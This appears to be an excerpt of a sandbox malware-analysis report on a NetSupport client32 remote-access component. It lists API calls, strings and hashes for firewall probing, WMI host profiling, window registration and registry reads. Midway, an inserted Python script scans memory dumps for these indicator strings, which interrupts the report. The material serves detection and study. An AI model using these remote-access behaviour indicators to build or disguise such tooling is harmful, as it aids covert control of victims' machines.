                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 1101792C
                                                                                  • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                  • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                  • CoUninitialize.COMBASE ref: 110179C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                   • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true (associated dump files as listed under the first client32 entry above)
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                  • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                  • API String ID: 2407233060-578995875
                                                                                  • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                  • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                  • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                  • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 11017842
                                                                                  • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                  • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                  • CoUninitialize.COMBASE ref: 110178D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                   • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true (associated dump files as listed under the first client32 entry above)
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                  • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                  • API String ID: 2407233060-2037925671
                                                                                  • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                  • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                  • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                  • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                  APIs
                                                                                  Strings
                                                                                  • AutoICFConfig, xrefs: 11139650
                                                                                  • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                  • DoICFConfig() OK, xrefs: 111396D6
                                                                                  • Client, xrefs: 11139655
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick
                                                                                  • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                  • API String ID: 536389180-1512301160
                                                                                  • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                  • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                  • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                  • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                  APIs
                                                                                  • send.WSOCK32(?,?,?,00000000), ref: 6F9F9C93
                                                                                  • timeGetTime.WINMM(?,?,?,00000000), ref: 6F9F9CD0
                                                                                  • Sleep.KERNEL32(00000000), ref: 6F9F9CDE
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6F9F9D4F
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 6F9F9D72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                  • String ID: 3'
                                                                                  • API String ID: 77915721-280543908
                                                                                  • Opcode ID: cee15a8c2466a6910415bdc5dc332940a379b86622b2d421258065bde6fa87e7
                                                                                  • Instruction ID: b568688e0d3531713c08483028070367c37fd90d6529776b06081bcb373a0cb6
                                                                                  • Opcode Fuzzy Hash: cee15a8c2466a6910415bdc5dc332940a379b86622b2d421258065bde6fa87e7
                                                                                  • Instruction Fuzzy Hash: 07215171A051188FDB20DF64CD84B9AB7B8AF05324F1182D5E91D9B2C5C734ED86CF91
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                  • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                  • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                  • API String ID: 3222248624-258972079
                                                                                  • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                  • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                  • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                  • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                  • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                  • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                  • API String ID: 4186647306-532032230
                                                                                  • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                  • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                  • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                  • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                  • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                  • CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                  • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                  • API String ID: 3360349984-1136101629
                                                                                  • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                  • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                  • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                  • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %s%s%s.bin$648351$_HF$_HW$_SW
                                                                                  • API String ID: 2111968516-434105583
                                                                                  • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                  • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                  • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                  • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06950
                                                                                    • Part of subcall function 6FA07BE0: _memset.LIBCMT ref: 6FA07BFF
                                                                                    • Part of subcall function 6FA07BE0: _strncpy.LIBCMT ref: 6FA07C0B
                                                                                    • Part of subcall function 6F9FA4E0: EnterCriticalSection.KERNEL32(6FA3B898,00000000,?,?,?,6F9FDA7F,?,00000000), ref: 6F9FA503
                                                                                    • Part of subcall function 6F9FA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6F9FA568
                                                                                    • Part of subcall function 6F9FA4E0: Sleep.KERNEL32(00000000,?,6F9FDA7F,?,00000000), ref: 6F9FA581
                                                                                    • Part of subcall function 6F9FA4E0: LeaveCriticalSection.KERNEL32(6FA3B898,00000000), ref: 6F9FA5B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                  • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                  • API String ID: 1112461860-1140593649
                                                                                  • Opcode ID: 1952d0a92e991f1744fc61f2d38042008b92e33d127bdd6e9e535099e9e30b92
                                                                                  • Instruction ID: a20f6dede7320631e16e9ab6563747698ac986a995d9eb86ec60b6a0f10535fd
                                                                                  • Opcode Fuzzy Hash: 1952d0a92e991f1744fc61f2d38042008b92e33d127bdd6e9e535099e9e30b92
                                                                                  • Instruction Fuzzy Hash: 64518076A047259ADB20EE78FC5079A77E5AB1332CF18812AD851C3381DB39E4D6CB52
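The entries above give a compact set of strings that the dumped client32 module references from specific behaviours: the HNetCfg.FwMgr ProgID and the "ICF Present:" / DoICFConfig() messages from the Windows Firewall probe, the Win32_SystemEnclosure / ChassisTypes names from the WMI enclosure query, the ..\ctl32\Refcount.cpp source path compiled into the thread wrapper, the PSAPI export names resolved at run time, the "Publish %d pending services" channel message, and (in the entry that follows) the NSMDesktopWnd window class. The script below is an added example, not Joe Sandbox or NetSupport code: it sweeps a raw memory region such as the .sdmp files listed under Memory Dump Source for those strings, in both ASCII and UTF-16LE, because COM ProgIDs and WMI class and property names are passed to the OLE/WMI APIs as BSTRs and may only be present in the wide form. The behaviour labels, the helper names and the sample region bytes are constructed for the example.

```python
"""Sweep a dumped memory region for the NetSupport client32 indicator strings
listed in this report.  Added example (not Joe Sandbox or NetSupport code);
the behaviour labels and the sample bytes are constructed for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, List

# Strings copied from the "Strings" / "String ID" lines of the report entries,
# grouped by the behaviour of the function that references them (labels are mine).
INDICATORS: Dict[str, List[str]] = {
    "firewall_probe": [            # CLSIDFromProgID("HNetCfg.FwMgr") / CoCreateInstance
        "HNetCfg.FwMgr", "ICF Present:", "AutoICFConfig", "DoICFConfig() OK",
        "DesktopTimerProc - Further ICF config checking will not be performed",
    ],
    "chassis_query": ["Win32_SystemEnclosure", "ChassisTypes"],  # WMI enclosure lookup
    "hidden_window": ["NSMDesktopWnd"],            # GlobalAddAtomA / RegisterClassA class
    "build_path": ["..\\ctl32\\Refcount.cpp"],     # source path compiled into client32
    "psapi_lookup": ["GetProcessImageFileNameA", "GetModuleFileNameExA"],
    "service_publish": ["Publish %d pending services"],
}


@dataclass(frozen=True)
class Hit:
    behaviour: str
    pattern: str
    encoding: str   # "ascii" or "utf-16le"
    offset: int


def scan_dump(data: bytes) -> List[Hit]:
    """Return every indicator occurrence in `data`, in both byte encodings.

    COM/WMI names (ProgIDs, class and property names) travel as BSTRs, so a
    region dumped while the client runs may hold them only as UTF-16LE;
    searching ASCII alone would miss the WMI query strings."""
    hits: List[Hit] = []
    for behaviour, patterns in INDICATORS.items():
        for pattern in patterns:
            for enc_name, needle in (("ascii", pattern.encode("ascii")),
                                     ("utf-16le", pattern.encode("utf-16-le"))):
                for m in re.finditer(re.escape(needle), data):
                    hits.append(Hit(behaviour, pattern, enc_name, m.start()))
    hits.sort(key=lambda h: h.offset)
    return hits


def behaviours_seen(hits: List[Hit]) -> Dict[str, List[Hit]]:
    """Group hits by behaviour so the analyst sees what the region does,
    not merely that a string matched."""
    grouped: Dict[str, List[Hit]] = {}
    for h in hits:
        grouped.setdefault(h.behaviour, []).append(h)
    return grouped


def looks_like_netsupport_client(hits: List[Hit], min_behaviours: int = 3) -> bool:
    """Require several independent behaviours rather than one string: a lone
    'HNetCfg.FwMgr' also appears in benign firewall-management code."""
    return len(behaviours_seen(hits)) >= min_behaviours


# Constructed sample region (not bytes from the report): a few indicator strings
# between filler bytes, with the WMI class name stored wide as a BSTR would be.
SAMPLE_REGION = (
    b"\x00" * 16
    + b"HNetCfg.FwMgr\x00ICF Present: \x00"
    + "Win32_SystemEnclosure".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 8
    + b"NSMDesktopWnd\x00..\\ctl32\\Refcount.cpp\x00"
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_REGION)
    for h in found:
        print(f"{h.offset:#08x} {h.encoding:8} {h.behaviour:16} {h.pattern}")
    print("netsupport client32 indicators:", looks_like_netsupport_client(found))
```

Run it against a real region by reading one of the dump files into `scan_dump` (`scan_dump(open(path, "rb").read())`). The verdict deliberately needs several behaviours at once: these strings identify the NetSupport client32 component, which is also deployed legitimately as remote-administration software, so a match says what the binary is, and the way it arrived on the host (the dropper chain and install path) decides whether it is malicious.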
                                                                                  APIs
                                                                                  • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                  • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                  • RegisterClassA.USER32(?), ref: 111036EF
                                                                                  • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                  • String ID: NSMDesktopWnd
                                                                                  • API String ID: 2669163067-206650970
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                  • API String ID: 47109696-3245241687
                                                                                  APIs
                                                                                    • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                    • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                    • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                  • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                  • API String ID: 806825551-1858614750
                                                                                  APIs
                                                                                    • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                    • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                  • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                                  • ResetEvent.KERNEL32(00000270), ref: 11144E39
                                                                                  • SetEvent.KERNEL32(00000270), ref: 11144E4F
                                                                                  • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                  • String ID: MiniDump
                                                                                  • API String ID: 1494854734-2840755058
                                                                                  APIs
                                                                                    • Part of subcall function 6F9F5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6F9F5014
                                                                                    • Part of subcall function 6F9F5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6F9F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6F9F5034
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6F9F8EAE
                                                                                  • FreeLibrary.KERNEL32(?), ref: 6F9F8EBF
                                                                                    • Part of subcall function 6F9F2420: _strrchr.LIBCMT ref: 6F9F242E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                  • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                  • API String ID: 3215810784-3459472706
                                                                                  APIs
                                                                                  • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
